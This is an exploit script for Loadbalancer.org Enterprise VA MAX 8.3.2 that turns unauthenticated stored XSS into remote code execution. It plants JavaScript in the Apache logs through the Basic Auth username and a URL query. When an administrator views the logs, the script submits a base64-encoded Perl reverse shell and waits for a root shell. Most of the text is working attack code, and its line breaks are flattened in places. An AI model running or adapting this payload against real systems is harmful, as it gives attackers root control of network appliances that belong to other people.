# Exploit Title: Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution# Date: 2018-07-24# Exploit Authors: Jakub Palaczynski# Vendor Homepage: https://www.loadbalancer.org/# Version: <= 8.3.2# CVE: N/A# Exploit Description: Loadbalancer.org Enterprise VA MAX - Remote Code Execution via Unauthenticated Stored XSS# Info: It is advised to use HTTPS port instead of HTTP for sending payloads as storing JavaScript in "Apache Error Log" does not work for HTTP.# Info: JavaScript can be easily changed to for example modify SSH configuration or add/modify web users# Basic Information:# Two instances of Stored XSS were found - exploit uses both:# 1. It is possible to inject custom JavaScript code during authentication to "/lbadmin/".# Application takes input from Basic Auth (username) and stores it without encoding/sanitization/filtering in "Apache Error Log".# This instance only forks for HTTPS.# 2. It is possible to inject custom JavaScript code by accessing URL like /?<XSS>.# Such JavaScript is stored in "Apache User Log".# This way attacker can store JavaScript code that can for example execute system command as root. This is actually what this exploit does - spawns reverse shell.# When application user browses "Apache Error Log" or "Apache User Log" custom JavaScript code gets automatically executed.#!/usr/bin/pythonimport socket
import sys
import os
import threading
import subprocess
import time
import base64
# print help or assign argumentsiflen(sys.argv)!=3:
sys.stderr.write("[-]Usage: python %s <our_ip:port> <proto://remote_ip:port>\n"% sys.argv[0])
sys.stderr.write("[-]Exemple: python %s\n"% sys.argv[0])
lhost = sys.argv[1]# our ip address and port
rhost = sys.argv[2]# ip address and port of vulnerable Loadbalancer
raw ="""perl -e 'use Socket;$i=\"""" + lhost.split(":")[0] + """\";$p="""+ lhost.split(":")[1]+""";socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"""# raw reverse shell in perl
payload_url ='document.getElementById("lb").contentDocument.forms[0].elements["command"].value = "echo '+ base64.b64encode(raw.encode("ascii"))+' | base64 -d | bash";document.getElementById("lb").contentDocument.forms[0].submit();'# base64 encoded reverse shell in perl
payload_auth ="<iframe id='lb'/src='/lbadmin/config/command.php'/style='width:0;height:0;border:0;border:none;'/onload=eval(atob('"+ base64.b64encode(payload_url.encode("ascii"))+"'))></iframe>:pwd"# base64 encoded reverse shell in perl# for additional thread to send request in parallelclassrequests(threading.Thread):defrun(self):
time.sleep(5)# send requests to trigger vulnerability
os.system('curl -s -k -m 10 -X "GET" -H "Authorization: Basic '+ base64.b64encode(payload_auth.encode("ascii"))+'" "'+ rhost +'/lbadmin/" > /dev/null')# store payload in Apache Error logs
os.system('curl -s -k -m 10 -X "GET" "'+ rhost +'/?<iframe/id=\'lb\'/src=\'/lbadmin/config/command.php\'/onload=\'eval(atob(\`'+ base64.b64encode(payload_url.encode("ascii"))+'\`))\'/style=\'width:0;height:0;border:0;border:none;\'></iframe>" > /dev/null')# store payload in Apache User logs# for additional thread to receive data from socketclassreceiving(threading.Thread):def__init__(self, conn):
self.conn = conn
self._is_running =Truedefstop(self):
self._is_running =Falsedefrun(self):while(self._is_running):
cmd = conn.recv(1024)
sys.stdout.flush()if cmd =='':break
threadr.stop()# function that creates socketdefcreate_socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
sock.bind(('', port))
conn, addr = sock.accept()return sock, conn, addr
# start thread that sends requestprint'Sending requests that triggers vulnerability.'
thread = requests()
thread.start()# create socket to receive shellprint'Now you need to wait for shell.'
sock, conn, addr = create_socket(int(lhost.split(":")[1]))
threadr = receiving(conn)
cmd =raw_input("")if cmd =='exit':
conn.send(cmd +"\n")breakelse:
conn.send(cmd +"\n")